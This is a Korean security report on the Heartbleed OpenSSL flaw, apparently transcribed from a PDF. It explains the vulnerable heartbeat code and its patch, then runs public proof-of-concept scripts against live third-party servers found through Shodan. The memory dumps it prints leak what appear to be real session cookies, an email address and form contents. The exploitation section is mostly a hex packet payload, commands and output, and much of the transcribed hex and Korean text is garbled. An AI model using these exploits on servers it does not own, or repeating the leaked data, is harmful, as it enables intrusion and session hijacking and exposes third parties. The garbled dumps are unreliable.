#HNS-WI CVE 버그분석 Heartbleed Bug v.01 ( 공개용 )
|
|
- 태평 누
- 5 years ago
- Views:
Transcription
1 #HNS-WI Heartbleed Bug v.01 ( 공개용 )
2 이자료는공개용버전으로, 일부내용이삭제되었거나수정되었으며, 일부내용은추가테스트과정이필요하고, 이테스트과정이끝난후업데이트될것임
3 내용요약 이보고서는 2014 년 4 월둘째주에심각한보안문제로등장한 CVE 취약점에대한분석과 proof of concept 코드테스트결과를담은것임 CVE 은일명 Heartbleed Bug 로불리는것은이취약점이 OpenSSL의 TLS/DTLS의 Heartbeat Extension을구현하는부분에서문제가발생하고, 관련정보를최초로공개한 Codenomicon에서비즈니스전략을위해피흘리는하트모양의이미지와함께 heartbleed 란용어를사용했으며, 이것이보안계에통용되었기때문임 CVE 취약점을공격할경우메모리로부터민감한정보 ( 비밀키, 패스워드, 개인정보등 ) 를확보할수있으며, 안드로이드시스템도공격 대상이될수있고, 공격자의흔적이남지않는특징이있음 취약한 OpenSSL 버전은 OpenSSL ~ 1.0.1f로, shodan을이용해검색한결과 OpenSSL 버전 1.0.1a을사용하는시스템은 554개, 1.0.1b는 1,047개, 1.0.1c는 172,127개, 1.0.1d는 27,500개, 1.0.1e는 349,561개, 1.0.1f는 11,370개였으며, proof of concept 코드로테스트한결과이들중일부는취약하지않은시스템도있었으며, 흥미로운것은 OpenSSL/1.0.1b 버전을가장많이사용하는국가는한국이었음 문제를해결하기위해 OpenSSL 1.0.1g 이상의버전으로업데이트가필요하고, yahoo 등을비롯한일부사이트의경우계정정보와패스워드등의정보가 유출되었으므로패스워드변경도필요함
4 1. 개요 CVE 취약점은 Google의연구원 Neel Mehta와보안회사 Codenomicon 1 의연구원들에의해발견되었으며, Heartbleed 버그관련정보는우리나라시간으로 4월 8일 ( 화 ) 에공개되었으며, CVE 식별자는 CVE 임 Codenomicon 사는 Heartbleed 관련웹사이트를별도로오픈하여정보를제공하고있으며, 웹사이트주소는 임 CVE 취약점이 Heartbleed Bug 로불리는것은이취약점이 OpenSSL의 TLS/DTLS의 Heartbeat Extension을구현하는부분에서문제가발생하고, 관련정보를최초로공개한 Codenomicon에서비즈니스전략을위해피흘리는하트모양의이미지와함께 heartbleed 란용어를사용했으며, 이것이보안계에통용되었기때문임 취약한 OpenSSL 버전은 OpenSSL ~ 1.0.1f, 그리고 beta1이며, OpenSSL에서 TLS/DTLS 구현이 Heartbeat Extension 패킷을적절하게핸들링하지못해발생하고, 원격공격자는이를이용해조작된패킷으로프로세스메모리에저장된민감한정보를획득할수있음 shodan을이용해검색한결과 OpenSSL 버전 1.0.1a을사용하는시스템은 554개, 1.0.1b는 1,047개, 1.0.1c는 172,127개, 1.0.1d는 27,500개, 1.0.1e는 349,561개, 1.0.1f는 11,370개였으며, proof of concept 코드로테스트한결과이들중일부는취약하지않은시스템도있었으며, 흥미로운것은 OpenSSL/1.0.1b 버전을가장많이사용하는국가는한국이었음 현재 CVE 취약점을테스트하기위해공개된 proof of concept 코드는 7개이상이며, 대부분 Jared Stafford의코드 hb-test.py 를수정한것들로, 연속수행기능을넣어한번의 heartbeat에 64KB의데이터만추출할수있는문제점을해결한 SensePost가수정한 heartbleed-poc.py 가활용도면에서가장뛰어난것으로보이며, 공개되지않은코드들중에는해커들이자신들의목적에맞게수정한것들도다수있을것으로추측됨 공격이성공할경우로그를남기지않기때문에공격을당했는지여부를확인하기쉽지않음 이문제를해결하기위해 OpenSSL 1.0.1g 에서는해당취약점이패치가되었으므로, OpenSSL 1.0.1g 이상의버전으로업데이트필요 / 22
5 2. 세부내용 1) CVE / Heartbleed Bug - 이취약점은 CVE를운영하는 MITRE( 에의해서 CVE , CVE 이라는식별번호를얻었는데, 이는동시에이취약점이발견되었기때문이며, 중복식별자사용으로인한혼란을막기위해 CVE 을공식식별자로사용하기로관련기관이결정함 - CVE 이 Heartbleed Bug 로불리는것은이취약점이 OpenSSL의 TLS/DTLS(Transport Layer Security / Datagram Transport Layer Security) 의 Heartbeat Extension(RFC ) 구현상의문제로발생하고, 관련정보를최초로공개한 Codenomicon에서기술적이유보다는비즈니스전략을위해이용어를사용했으며, 이것이보안계에통용되었기때문임 - Codenomicon의자료 3 에따르면, 실제자신들의테스트에서 Codenomiconn 은 X.509 인증을위해사용되는비밀키를확보할수있었다고주장하고있으나 Google 의연구원 Adam Langley는비밀키와같은민감한정보는유출되지않았으며, 오래된연결버퍼들 ( 쿠키등 ) 만확보할수있었다고상반된주장을하고있으며, 사용자 ID와패스워드가노출되는것을확인한자료들은공개되고있으나아직비밀키가노출되었다는자료는 4월 10일오전현재공개되지않은상태임 - 초기대응이늦었던 yahooo 의경우계정 id와패스워드정보등이노출되었음 / 22
6 - 취약한 OpenSSL 버전은 OpenSSL ~ 1.0.1f, 그리고 beta1까지로알려져있으며 4, 1.0.1g에서패치가이루어졌고, OpenSSL에서 TLS/DTLS 구현이 Heartbeat Extension 패킷을적절하게핸들링하지못해발생하고, 원격공격자는이를이용해조작된패킷으로프로세스메모리에저장된민감한정보를획득할수있음 - 취약한버전을탑재한운영체제 * Debian Wheezy (stable), OpenSSL 1.0.1e-2+deb7u4 * Ubuntu LTS, OpenSSL ubuntu5.11 * CentOS 6.5, OpenSSL 1.0.1e-15 * Fedora 18, OpenSSL 1.0.1e-4 * OpenBSD 5.3 (OpenSSL 1.0.1c 10 May 2012) & 5.4 (OpenSSL 1.0.1c 10 May 2012) * FreeBSD OpenSSL 1.0.1e 11 Feb 2013 * NetBSD (OpenSSL 1.0.1e) * OpenSUSE 12.2 (OpenSSL 1.0.1c) - 취약하지않은버전을탑재한운영체제 * Debian Squeeze (oldstable), OpenSSL 0.9.8o-4squeeze14 * SUSE Linux Enterprise Server * FreeBSD OpenSSL 0.9.8y 5 Feb 2013 * FreeBSD OpenSSL 0.9.8y 5 Feb 2013 * FreeBSD Ports - OpenSSL 1.0.1g (At 7 Apr 21:46: UTC) - TLS Heartbeat 매커니즘은데이터가전송이되지않고있을때도연결을지속하도록디자인되었으며 5, payload 길이와랜덤한데이터를가지고있는 HeartbeatRequest 메시지를한 peer가전송하면, HeartbeatRequest 메시지를받은상응하는 peer는반드시수신한 HeartbeatRequest payload와정확하게같은데이터의 HeartbeatResponse를보내야만함 6, - 이버그와관련된파일은 d1_both.c 와 t1_lib.c 로, CVE 버그를일으키는취약한 부분은다음과같음 rfc6520 에서부분발췌, The Heartbeat Extension provides a new protocol for TLS/DTLS allowing the usage of keep-alive functionality without performing a renegotiation and a basis for path MTU (PMTU) discovery for DTLS. 6 rfc6520 에서부분발췌, A HeartbeatRequest message can arrive almost at any time during the lifetime of a connection. Whenever a HeartbeatRequest message is received, it SHOULD be answered with a corresponding HeartbeatResponse message. 3 / 22
7 /* HeartbeatRequest 의데이터구조체 */ 7 struct { HeartbeatMessageType type; uint16 payload_length; opaque payload[heartbeatmessage.payload_length]; opaque padding[padding_length]; } HeartbeatMessage; /* 다음은 t1_lib.c 파일에서발췌한부분으로, CVE 취약점을초래하는부분 */ #ifndef OPENSSL_NO_HEARTBEATS int tls1_process_heartbeat(ssl *s) { unsigned char *p = &s->s3->rrec.data[0], *pl; unsigned short hbtype; unsigned int payload; unsigned int padding = 16; /* Use minimum padding */ /* Read type and payload length first */ hbtype = *p++; n2s(p, payload); // 사용자가통제하는데이터로부터 payload 길이를읽음 pl = p; if (s->msg_callback) s->msg_callback(0, s->version, TLS1_RT_HEARTBEAT, &s->s3->rrec.data[0], s->s3->rrec.length, s, s->msg_callback_arg); if (hbtype == TLS1_HB_REQUEST) { unsigned char *buffer, *bp; int r; /* Allocate memory for the response, size is 1 bytes * message type, plus 2 bytes payload length, plus * payload, plus padding */ buffer = OPENSSL_malloc( payload + padding); bp = buffer; /* Enter response type, length and copy payload */ *bp++ = TLS1_HB_RESPONSE; s2n(payload, bp); memcpy(bp, pl, payload); // 실제 payload 크기에대한확인없이읽은 payload 길이를사용 bp += payload; /* Random padding */ RAND_pseudo_bytes(bp, padding); r = ssl3_write_bytes(s, TLS1_RT_HEARTBEAT, buffer, 3 + payload + padding); 7 rfc6520, 섹션 4, Heartbeat Request and Response Messages 에서발췌 4 / 22
8 - 위의코드를보면 incoming 데이터는바운드체킹을하지않는 payload 길이를포함하고있으며, OpenSSL은이에응답하기위해버퍼를할당하는데, 'payload' 데이터바이트를포인터 'pl' 로부터그버퍼에복사하지만데이터에 'payload' 바이트가실제로있는지확인하지않으며, 그래서공격자는프로세스메모리로부터 64KB의데이터 조각 을확보할수있음 - 이문제는다음과같이바운드체킹을통해해결할수있음 + /* Read type and payload length first */ + if ( > s->s3->rrec.length) + return 0; /* silently discard */ + hbtype = *p++; + n2s(p, payload); + if ( payload + 16 > s ->s3->rrec.length) + return 0; /* silently discard per RFC 6520 sec. 4 */ + pl = p; + 2) 취약점확인 / Proof of Concept 코드 / 스캐너 - 테스트를위해사용할취약한서버들은 shodan을이용해찾았으며, 유료사용자가아닐경우 shodan 웹사이트를통해검색할경우그결과값을 10개밖에볼수가없어서 shodan의파이썬의 API를이용해스캐닝코드를작성하여검색하였으며, 검색키워드는 OpenSSL 과 OpenSSL/1.0.1 로설정하였으며, OpenSSL/1.0.1 로검색했을때는정확한버전정보가나오지않아정확한버전을입력하여검색함 - 다음은취약한 OpenSSL 버전을찾기위해사용한파이썬코드임 5 / 22
9 - 파이썬스캐닝코드로검색한결과 OpenSSL 버전 1.0.1a는 554개, 1.0.1b는 1,047개, 1.0.1c는 172,127개, 1.0.1d는 27,500개, 1.0.1e는 349,561개, 1.0.1f는 11,370개였으며, proof of concept 코드로테스트한결과이들중일부는취약하지않은시스템도있어일부시스템은보안조치를실시한것으로보이며, shodan 검색엔진을이용한결과를바탕으로보면적어도 50,000개이상의시스템이취약할것으로판단됨 - 다음표는 Shodan 웹사이트를통해취약한버전들이사용되는서비스와가장많이 사용하는국가들의목록이며, 취약한시스템들이업데이트가되고있어표에서나오는 취약한시스템의수는점차줄어들것으로예상됨 6 / 22
10 - 앞의결과를보면 OpenSSL/1.0.1b 버전을가장많이사용하는국가는한국임을알수있음 #1. filippo.io/heartbleed/ 이용 - 개발자이자암호전문가인 Filippo Valsorda는 CVE 버그에취약한지여부를확인할수있는웹사이트 를공개하였으며, 해당 checker 소스코드는 7 / 22
11 - 그러나확인결과이사이트의테스트결과가정확하지않을때가있으며, 따라서이사이트를이용해취약성여부를체크하는것은정확하지않은결과와판단을내릴수있으며, 다음은국내사이트를대상으로이문제에대해확인한것임 - 위의결과에서는취약하지않다고나오지만공개된 proof of concept 코드를이용하면다음과같이정보가노출되어, 해당호스트는 CVE 버그에취약함을확인할수있음 #2. Jared Stafford의 OpenSSL heartbeat PoC, hb-test.py - 이 PoC 코드는가장먼저공개된 proof of concept 코드로, 현재다른해커들에의해수정되고있으며, 최초코드는 - hello packet 분석 hello = h2bin(''' 1: dc d : 43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a cf 3: bd cc 16 0a f d4 de 00 4: c0 14 c0 0a c0 22 c : c0 0f c c0 12 c0 08 c0 1c 6: c0 1b c0 0d c a c0 13 c0 09 7: c0 1f c0 1e a : c0 0e c f c0 11 c0 07 c0 0c 9: c : ff b / 22
12 11: a e 00 0d : 00 0b 00 0c a : : f : 00 0f ''') - 라인 1: TLS header + handshake header TLS header: dc * 16 컨텐츠타입 - Handshake * TLS 버전 (1.1 / TLS 1.0 / TLS 1.2) * 00 dc 길이 ( 바운드체킹을위해사용 ) Handshake header: d * 01 handshake 타입 - Client Hello * d8 길이 ( 바운드체킹을위해사용 ) * TLS 버전 라인 1, 2, 3: 랜덤데이터 (32 byte) * 53 ~ de - 라인 3: session id * 00 - 라인 15 * 00 0f Extension 타입 (Heart Beat) 체크 * 길이 * 01 모드 - peer는 request를전송하는것이허용 - Heartbeat 패킷 hb = h2bin(''' ''') - 다음테스트결과는임의의취약한외국사이트를대상으로한것으로, 취약성여부만 확인하고, 민감한정보를악의적으로사용하지않고결과를확인후바로삭제함 ghost-2:heartbleed ghost$ python hb_test.py Usage: hb_test.py server [options] Test for SSL heartbeat vulnerability (CVE ) Options: -h, --help show this help message and exit -p PORT, --port=port TCP port to test (default: 443) -s, --starttls Check STARTTLS -d, --debug Enable debug output ghost-2:heartbleed ghost$ python hb_test.py xx.xxx.xxx.xxx Connecting... Sending Client Hello... Waiting for Server Hello received message: type = 22, ver = 0302, length = received message: type = 22, ver = 0302, length = received message: type = 22, ver = 0302, length = / 22
13 ... received message: type = 22, ver = 0302, length = 4 Sending heartbeat request received message: type = 24, ver = 0302, length = Received heartbeat response: 0000: D B 90 9D 9B 72 0B BC 0C.@...SC[...r : BC 2B 92 A CF BD CC 16 0A H : 9F D4 DE C0 14 C0 0A C0 22 C0.w.3...f...". 0030: C0 0F C ! : 84 C0 12 C0 08 C0 1C C0 1B C0 0D C : A C0 13 C0 09 C0 1F C0 1E : 9A C0 0E C F E.D.../ : 41 C0 11 C0 07 C0 0C C A : FF : B A I a0: b0: A3 9A 6E 7F 00 00!...@...n... 03c0: 10 C0 7A 9B 6E 7F E z.n &f 03d0: 3D C D C 3D 6A 61 =serial& =ja 03e0: B 7A F cquieskz127%40ho 03f0: 74 6D C 2E 63 6F 6D B 7A 31 tmail.com.ieskz1 0400: F 74 6D C 2E 63 6F 6D 27%40hotmail.com 0410: A F 77 5F 70 6C F.7:"show_pl aceho 0420: 6C B 73 3A 30 3A B 73 3A lders";s:0:"";s: 0430: A F F F :"shortcode_ch 0440: 61 6E 6E 65 6C 5F B 73 3A 30 3A annel_id";s:0:"" 0450: 3B 73 3A A C 74 5F 61 ;s:15:"default_a 0460: 64 5F B 73 3A 30 3A B 73 d_type";s:0:"";s 0470: 3A A F 6F 67 6C 65 5F 63 6F 6C 6F :15:"google_colo 0480: 72 5F B 73 3A 37 3A r_bg" ;s:7:"#ffff 0490: B 73 3A A F 6F 67 6C 65 FF";s:19:"google 04a0: 5F 63 6F 6C 6F 72 5F 62 6F B 73 _color_border";s 04b0: 3A 37 3A B 73 3A 31 :7:"#EEEEEE";s:1 04c0: C0 BC 79 9B 6E 7F y.n... 04d0: A3 9A 6E 7F D 2E 63 6F 6D e0: A F 6F 67 6C 65...:"google 04f0: 5F 63 6F 6C 6F 72 5F C 22 3B 73 3A 37 3A _color_url";s:7: 0500: B 73 3A A 22 "#888888";s:17:" 0510: 67 6F 6F 67 6C 65 5F 63 6F 6C 6F 72 5F google_color_tex 0520: B 73 3A 37 3A t";s:7:"# " 0530: 3B 73 3A 37 3A F 6E 22 3B 73 ;s:7:"version";s 0540: 3A 33 3A E B 7D 69 3A 33 3B 61 3A :3:"1.6";}i:3;a: 0550: 36 3A 7B 73 3A 35 3A C B 73 6:{s:5:"title";s 0560: 3A 30 3A B 73 3A A :0:"";s:10:"adse 0570: 6E F B 73 3A A nse_id";s:16:" : B "; 0590: 73 3A 34 3A B 73 3A A s:4:" type";s:15: 05a0: D 73 6B "wide -skyscraper 05b0: 22 3B 73 3A 34 3A C 6F B 73 3A 31 ";s:4:"slot";s:1 05c0: 30 3A E :" d0: E0 9A 6E 7F d..n... 05e0: 78 C E 7F F 6E E 74 x...n..."content 05f0: E F0 88 D1 9A 6E 7F n : 78 C E 7F A 22 5F 6D 75 6C 74 x...n...2:"_mult 0610: C B6 79 9B 6E 7F y.n : 78 C E 7F BD 79 9B 6E 7F x...n...h.y.n : A B0 79 9B 6E 7F y.n : A3 9A 6E 7F E 74 3A 20 W 0650: 6F F E 36 ordpress/avh : 2E 33 3B A 2F 2F E 73.3; : 6E 6F E 69 6E 66 6F 0D 0A 48 6F 73 nowweb.info..hos 0680: 74 3A E F F D t: : D 2E 63 6F 6D 0D 0A spam.com..accept 06a0: 3A 20 2A 2F 2A 0D 0A 00 FF FF FF FF : */*...B... 06b0: C8 BD 79 9B 6E 7F y.n... 06c0: F p...get /api 06d0: 3F D E E E?ip= e0: D C D &f=serial&emai 06f0: 6C 3D 6A B 7A l=jacquieskz127% 0700: F 74 6D C 2E 63 6F 6D hotmail.com HT 0710: F 31 2E 30 0D 0A D TP/1.0..User -Age 10 / 22
14 0720: 6E 74 3A F F nt: WordPress/AV 0730: E 36 2E 33 3B A 2F 2F H 3.6.3; : E 73 6E 6F E 69 6E 66 6F nowweb.info 0750: 0D 0A 48 6F A E F 70..Host: : 66 6F D D 2E 63 6F 6D 0D 0A 41 forumspam.com..a 0770: A 20 2A 2F 2A 0D 0A ccept: */*..Acce 0780: D 45 6E 63 6F E 67 3A pt-encoding: def 0790: 6C B 71 3D 31 2E 30 2C F 6D 70 late;q=1.0, comp 07a0: B 71 3D 30 2E 35 0D 0A 0D 0A 3A 35 ress;q=0.5...:5 07b0: 3A 22 4C 69 6E B 73 3A 34 3A 22 6E 61 :"Linux";s:4:"na 07c0: 6D B 73 3A 37 3A F 78 me";s:7:"firefox 07d0: 22 3B 73 3A 37 3A F 6E 22 3B ";s:7:"version"; 07e0: 73 3A 36 3A E 30 2E B 73 3A 31 s:6:"14.0.1";s:1 07f0: 30 3A F C 22 3B 73 0:"update_url";s 0800: 3A A A 2F 2F E :23:" 0810: F 78 2E 63 6F 6D 2F 22 3B 73 3A firefox.com/";s: 0820: 37 3A D 67 5F B 73 3A :"img_src";s: : A C E 7F x...n : 30 B0 79 9B 6E 7F F 69 6D F 0.y.n.../images/ 0850: F F F 78 browsers/fi refox 0860: 2E 70 6E B 73 3A 60 B E 7F png";s:`...n : C E 7F a...x...n : 78 C E 7F F x...n...ordpress 0890: 2E 6F F 69 6D F F 77.org/images/brow 08a0: F F 78 2E 70 6E 67 sers/firefox.png 08b0: 22 3B 73 3A A E 74 5F ";s:15:"current_ 08c0: F 6E 22 E versi on"... 08d0: C A 7F E5 DD 4A 43 F7 D0...JC.. 3fd0: fe0: @... 3ff0: E0 F7 79 9B 6E 7F p...y.n... WARNING: server returned more data than it should - server is vulnerable! ghost-2:heartbleed ghost$ #3. Andreas Thienemann의 OpenSSL heartbeat PoC, ssltest.py - 이 PoC 코드는 Jared Stafford의 hb_test.py 코드를수정하여 64KB reading을가능하게했고, 코드실행결과를 dump 파일로저장하는기능을추가한것인데, 64KB reading을가능하게한것은앞에서취약한코드부분을설명할때언급했던것과관련있음 ghost-2:heartbleed ghost$ python ssltest.py xx.xxx.xxx.xxx Connecting... Sending Client Hello... Waiting for Server Hello... Server length: received message: type = 22, ver = 0302, length = 58 Server length: received message: type = 22, ver = 0302, length = 995 Server length: received message: type = 22, ver = 0302, length = 525 Server length: 4... received message: type = 22, ver = 0302, length = 4 Sending heartbeat request... Server length: received message: type = 24, ver = 0302, length = Received heartbeat response: 0000: 02 FF FF D B 90 9D 9B 72 0B BC 0C...SC[...r : BC 2B 92 A CF BD CC 16 0A H : 9F D4 DE C0 14 C0 0A C0 22 C0.w.3...f...". 0030: C0 0F C ! : 84 C0 12 C0 08 C0 1C C0 1B C0 0D C / 22
15 0050: A C0 13 C0 09 C0 1F C0 1E : 9A C0 0E C F E.D.../ : 41 C0 11 C0 07 C0 0C C A : FF : B A I : A 77 6C 5F 66 6F 75...jwl_fou 0210: 72 5F F 6C F r_fifth_last/var 0220: 2F 7A E 65 6C 2F 68 6F /zpanel/hostdata 0230: 2F 7A D 69 6E 2F C F 68 /zadmin/public_h 0240: 74 6D 6C 2F 73 6E 6F F 69 6E 66 6F tml/snowweb_info 0250: 2F D 63 6F 6E E 74 2F 70 6C /wp-content/plug 0260: 69 6E 73 2F 75 6C D D E ins/ultimate -tin 0270: 79 6D F 6F F 6E 73 5F E ymce/options_fun 0280: F 6E 73 2E ctions.php0 x7f6e 0290: F B 73 3A 95ec37b6_src";s: 02a0: F1 0B E7 AA 9A 6E 7F n... 02b0: 78 C E 7F x...n... 3ff0: FF FF FF FF... Received content written to the file./dump WARNING: server returned more data than it should - server is vulnerable! Server length: received message: type = 24, ver = 0302, length = Received heartbeat response: 0000: B0 9C 6E 7F n...w : FF FF FF FF : : P : B0 1C AB 9A 6E 7F p...n : 1C E 7F AB 9A 6E 7F n...n : : B0 15 AB 9A 6E 7F A6 9B 6E 7F n...b..n : A 77 6C 5F jwl_ptag 0090: 73 5F C 6C B 5F E s_callback_funct 00a0: 69 6F 6E A 34 3A F B 73 ion.s:4:"post";s 3ff0: Received content written to the file./dump WARNING: server returned more data than it should - server is vulnerable! ghost-2:heartbleed ghost$ - 결과가저장된 dump 파일의내용은 strings 를이용해다음과같이확인할수있음 ghost-2:heartbleed ghost$ strings dump wp_admin_bar_render wp_admin_bar_wp_menu wp_admin_bar_my_account_item wp_admin_bar_my_account_menu wp_admin_bar_site_menu wp_admin_bar_my_sites_menu wp_admin_bar_shortlink_menu pass to the wp_admin_bar_edit_menu wp_admin_bar_new_content_menu wp_admin_bar_comments_menu wp_admin_bar_search_menu wp_admin_bar_add_secondary_groups wp_admin_bar_header _admin_bar_bump_cb show_admin_bar is_admin_bar_showing 12 / 22
16 _get_admin_bar_pref WP_PLUGIN_URL PLUGINDIR WPMU_PLUGIN_DIR WPMU_PLUGIN_URL MUPLUGINDIR host COOKIEHASH USER_COOKIE PASS_COOKIE AUTH_COOKIE SECURE_AUTH_COOKIE LOGGED_IN_COOKIE TEST_COOKIE COOKIEPATH k parame! SITECOOKIEPATH when to a xecution! ADMIN_COOKIE_PATH -nextgen_basic_temp h/var/zpanel/hostdata/zadmin/public_html/snowweb_info/wp -content/plugins/nextgengallery/products/photocrati_nextgen/modules/mvc/template_helper.php0x7f6e95ec21280x7f 6e95ec205 dx7f6e95ec2020io m_validation wp_admin_bar_site_menu wp_admin_bar_my_sites_menu wp_admin_bar_shortlink_menu pass to the wp_admin_bar_edit_menu wp_admin_bar_new_content_menu ghost-2:heartbleed ghost$ #4. Michael Davis의 session hijacking 공격을위한세션추출코드 - 이 PoC 코드는 에서확인할수있으며, Jared Stafford의 hb_test.py 코드를수정하여 HTTP session ID cookies를추출함 - 현재이취약점을이용해추출한 HTTPd session ID cookies 를이용해세션하이재킹 공격을실행한예가공개되어있므로, 다음링크의예를참고 #5. SensePost의수정된 OpenSSL heartbeat PoC, heartbleed-poc.py - 이 PoC 코드는 Jared Stafford의 hb_test.py 코드를수정한것으로, 앞의코드들과같은기능을하면서, 반복실행횟수를지정하여더많은정보를수집할수있으며, 그결과를별도파일로저장하여 awk, grep, pcregrep과같은툴을이용해다양한정보를추출할수있으며, 메일서버를체크하는기능도추가되었음 / 22
17 - 아래는 10 회반복실행을하며, 그결과를 dump.bin 에저장함 ghost-2:heartbleed ghost$ python heartbleed-poc.py -n10 -f dump xxx.xxx.xxx.xxx Scanning xxx.xxx.xxx.xxx on port 443 Connecting... Sending Client Hello... Waiting for Server Hello received message: type = 22, ver = 0302, length = received message: type = 22, ver = 0302, length = received message: type = 22, ver = 0302, length = received message: type = 22, ver = 0302, length = 4 Server TLS version was 1.2 Sending heartbeat request received message: type = 24, ver = 0302, length = Received heartbeat response: 0000: D B 90 9D 9B 72 0B BC 0C.@...SC[...r : BC 2B 92 A CF BD CC 16 0A H : 9F D4 DE C0 14 C0 0A C0 22 C0.w.3...f...". 0030: C0 0F C ! : 84 C0 12 C0 08 C0 1C C0 1B C0 0D C : A C0 13 C0 09 C0 1F C0 1E : 9A C0 0E C F E.D.../ : 41 C0 11 C0 07 C0 0C C A : FF : B A I a0: E 00 0D B 00 0C b0: 0A c0: F d0: F A 69...#... gzi 00e0: 70 2C C D 0A p, deflate..acce 00f0: A F D 6C 2C pt: text/html,ap 0100: 70 6C F 6E 2F D 6C 2B plication/xhtml+ 0110: 78 6D 6C 2C C F 6E 2F xml,application/ 0120: 78 6D 6C 3B 71 3D 30 2E 39 2C 2A 2F 2A 3B 71 3D xml;q=0.9,*/*;q= 0130: 30 2E 38 0D 0A D 4C 61 6E Accept-Lang 0140: A E 2D D 0A 43 6F 6E uage: en -us..con 0150: 6E F 6E 3A 20 6B D 61 6C nection: keep -al 0160: D 0A 44 4E 54 3A D 0A ive..dnt: 1..Use 0170: 72 2D E 74 3A 20 4D 6F 7A 69 6C 6C 61 r -Agent: Mozilla 0180: 2F 35 2E B /5.0 (ipad; CPU 0190: 4F F 30 5F C 69 6B D 61 OS 7_0_2 like Ma 01a0: F C c OS X) AppleWeb 01b0: 4B F E E B 48 Kit/ (KH 01c0: 54 4D 4C 2C 20 6C 69 6B B 6F 29 TML, like Gecko) 01d0: F 6E 2F 37 2E D 6F 62 Version/7. 0 Mob 01e0: 69 6C 65 2F ile/11a501 Safar 01f0: 69 2F E D 0A 0D 0A 47 4B C2 i/ gk. 0200: C2 81 8C CB F6 98 7C D4 6F 41 FF C3 92 E1 F oA : AA 2B 09 D6 7E 5F 1D AD A7 6A EF D8 A6 4B F ~_...j...K.$ 0220: 9D 46 6A 4A 39 0B B9 2E CF 8C 7B FjJ9.S...{ : 0A D 4C 61 6E Accept -Language 0240: 3A E 2D C 65 6E 3B 71 3D 30 2E 38 : en -US,en;q= : 0D 0A 43 6F 6F 6B A 20 4A Cookie: JSESSI 0260: 4F 4E D ONID=F79BE6FCBF7 0270: ADB4F1F3E200CA : E 6E F 0D 0A 0D 0A AAD34.newtwo : E8 11 3E 17 BF F 3D BB 0E 71 1D 6F >..bi/=..q.o.i 02a0: D0 3C 12 AA 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B 0B.<... 02b0: F 4E D SESSIONID=F79BE6 02c0: FCBF7ADB4F1F3E20 02d0: E 6E CA47AAD34.newtw 02e0: 6F 0D 0A 0D 0A F F 30 3D 26 o...id12_hf_0=& 02f0: 6D 6F C F 6E mobilephone%3ace 0300: 6C 6C F 6E D D 6F 62 llphone1=210&mob 0310: 69 6C F 6E C 6C 50 ilephone%3acellp 0320: 68 6F 6E D D 6F C 65 hone2=861&mobile 0330: F 6E C 6C F 6E Phone%3AcellPhon 0340: D e3=1530&issuetyp 0350: 65 3D C 31 e=1&issuede tail1 0360: 3D C 32 3D 26 =&issuedetail2=& 0370: 6F D 69 2B B 74 other=i+refuse+t 14 / 22
18 0380: 6F 2B B B 6F 6E 2B 79 6F 75 o+give+up+on+you 0390: 2B B B 69 2B +guys+because+i+ 03a0: E 6B 2B C 6C 2B think+y%27all+ar 03b0: 65 2B 6D 79 2B 73 6F 75 6C 2B e+my+soul+surviv 03c0: 6F D1 9C C2 88 B C4 81 or%27 s...$h... 03d0: CC FC 70 A9 1A "..p...e... 03e0: A A F 64 w8zy1b0cfbbj7aod 03f0: 4E D 0A 43 6F 6E E 74 2D NwgATg..Content : 4C 65 6E A D 0A 43 6F 6E 6E Length: 13..Conn 0410: F 6E 3A 20 6B D 61 6C 69 ection: keep -ali 0420: D 0A 43 6F 6F 6B A 20 4A ve..cookie: JSES 0430: F 4E D SIONID=18B688BAF 0440: EA77DB03151C : E 6E F 0D 0A 52ADC2A.newtwo : 0D 0A E BC CA 44 B1 6D 1E E4 15 F0..9W~..D.m." : A5 5A DB 5E CA 8E C2 60 9D 1C D2 A4 CB 5A 1E F7.Z.^...`...Z : 32 BA AA 1A 67 D2 E D B B g...}% : 4F 58 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D 0D OX... 04a0: D D 320&bih=460&psw= 04b0: D D 3D 320&psh=148&frm= 04c0: D C &ui=uv3sl1sr1cc 04d0: 31 2D af3st13sd13sv1 04e0: 33 2D D D st12-st12-&rur 04f0: 6C 3D l=http%3a%2f%2fw 0500: E F 6F D 79 6F D 62 ww.choose -your-b 0510: D 6F F 6E 2E 63 6F 6D est-option.com%2 0520: C D Frelated%2Fsamed 0530: D D 6C 6F 61 6E 73 2D ay -payday-loans- 0540: 6F 6E 6C 69 6E 65 2E D onlin e.htm%3fque 0550: D ry%3dsameday%2bp 0560: C 6F 61 6E ayday%2bloans%2b 0570: 4F 6E 6C 69 6E F 6B 65 Online%26afdToke 0580: 6E D F n%3dcqcbchmirbso 0590: C C A xplvvqivqu3lch0z 05a0: XwDDEAIYASAAUP7H 05b0: C yqvq35wdb1dql5ui 05c0: 55 4F C F 2D UOyXlQhQ1dO -EVDC 05d0: E 6A E v8TUP2NjRVQnuqW 05e0: D B A 51 H1CM7fwgUKi50CJQ 05f0: D 62 4C A 68 6C 55 4F a -blvdxwzhluoib 0600: 6F 33 4A A C F 5F 74 o3jq0ztclwfq8 t 0610: 6C A lwfqur2jygfqrexc 0620: A 51 7A 66 4F 38 6D 67 4E D 9wJQzfO8mgNxr6R- 0630: E F HgVptpCNAcDoVcaR 0640: D 4E A B AWPQMNy3TjtykQEU 0650: F 70 6B B 73 3eQu0Opk05E BeIKs 0660: F A 4B PAwDvfoSGQCchQJK 0670: D 4A Gyw -JScVwt1dd0dw 0680: B 50 4F 31 4A D 0wCkPO1Jd7E&ref= 0690: E http%3a%2f%2fdp. 06a0: 67 2E 64 6F C C B 2E 6E 65 g.doubleclick.ne 06b0: t%2fstatic%2fcaf 06c0: C E D 6C 0D 0A 41 %2Fsl ave.html..a 06d0: D 45 6E 63 6F E 67 3A 20 ccept -Encoding: 06e0: 67 7A C C D 0A 0D gzip, deflate... 06f0: 0A 2A 89 6F A3 5B 8A 04 CB 83 CE 10 E *.o.[...7p" 0700: EB D 58 B7 7E 5D 0C ED DB A0...=X.~]...u.6x. 3ff0: 74 2E C 5B 67 5D 7C 7C 7B 7D t.special[g] {} WARNING: server xxx.xxx.xxx.xxx returned more data than it should - server is vulnerable! ghost-2:heartbleed ghost$ - 1 회실행하였을때 dump 파일의크기는 16,384 바이트, 10 회반복실행시 180,224 바이트였으나, 100 회반복실행했을때 dump 파일의크기는 1,703,936 바이트였으며, 그 정보의양과질에서도차이가났음 15 / 22
